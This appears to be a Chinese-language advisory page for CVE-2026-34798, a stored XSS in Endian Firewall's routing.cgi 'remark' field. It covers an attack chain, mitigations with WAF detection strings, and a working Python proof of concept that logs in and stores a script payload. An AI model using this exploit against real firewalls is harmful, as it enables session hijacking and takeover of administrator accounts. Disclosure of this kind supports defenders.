IPBUF安全漏洞报告
English
CVE-2026-34798 CVSS 6.4 中危

CVE-2026-34798: Endian Firewall 存储型XSS漏洞

披露日期: 2026-04-02
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34798
漏洞类型
存储型XSS
CVSS评分
6.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Endian Firewall

相关标签

XSS存储型XSSWeb安全Endian FirewallCVE-2026-34798

漏洞概述

Endian Firewall 3.3.25及更早版本被发现存在存储型跨站脚本(XSS)漏洞。该漏洞源于/routing.cgi接口对remark参数缺乏严格的输入验证与输出编码。低权限攻击者可注入恶意脚本,该脚本在管理员访问受影响页面时自动执行,进而窃取敏感数据或劫持用户会话。

技术细节

漏洞位于Endian Firewall的Web管理界面/cgi-bin/routing.cgi脚本中。具体而言,当系统处理路由配置的“remark”(备注)字段时,后端应用程序未对用户提交的输入执行严格的过滤或HTML实体编码。攻击者只需经过低权限认证,即可在该字段构造包含恶意JavaScript代码的Payload(例如<script>alert(document.cookie)</script>)。该Payload提交后会被持久化存储在服务器端。当具有更高权限的管理员用户访问该路由配置页面进行管理时,服务器会返回未经过滤的恶意代码,导致受害者的浏览器解析并执行该脚本。由于这是存储型XSS,攻击过程具有持久性,攻击者可借此窃取管理员凭证、劫持会话或在管理员浏览器中执行未授权操作。

攻击链分析

STEP 1
侦察与认证
攻击者发现目标使用Endian Firewall,并通过低权限账号登录Web管理界面。
STEP 2
漏洞利用
攻击者向/cgi-bin/routing.cgi发送POST请求,在'remark'参数中植入恶意JavaScript代码。
STEP 3
恶意存储
后端服务器未过滤特殊字符,将恶意脚本持久化存储在数据库或配置文件中。
STEP 4
触发执行
管理员或其他用户访问受影响的路由配置页面,浏览器加载并执行注入的脚本。
STEP 5
达成目标
脚本窃取受害者的Session ID或执行任意操作,攻击者从而接管管理员权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://target-ip/cgi-bin/routing.cgi" login_url = "http://target-ip/cgi-bin/login.cgi" # Attacker credentials (Low privilege) username = "attacker" password = "password" # Malicious Payload to be stored xss_payload = '<script>alert("CVE-2026-34798_POC");</script>' # Create a session to maintain cookies session = requests.Session() # 1. Login to the application login_data = { "username": username, "password": password } session.post(login_url, data=login_data) # 2. Send the exploit payload via the vulnerable parameter # The vulnerability is in the 'remark' parameter exploit_data = { "action": "save", "remark": xss_payload, "network": "192.168.1.0/24", "gateway": "192.168.1.1" } response = session.post(target_url, data=exploit_data) if response.status_code == 200: print("[+] Payload injected successfully.") print("[+] The XSS will trigger when an admin views the routing page.") else: print("[-] Failed to inject payload.")

影响范围

Endian Firewall <= 3.3.25

防御指南

临时缓解措施
临时缓解措施建议管理员严格限制对Web管理界面的访问权限,仅允许受信任的IP地址访问。同时,可以通过部署Web应用防火墙(WAF)规则,检测并拦截包含恶意脚本字符(如 <script>、onerror=)的请求体。在官方补丁发布前,应避免让低权限用户配置路由备注信息,或暂时禁用受影响的功能模块以降低风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表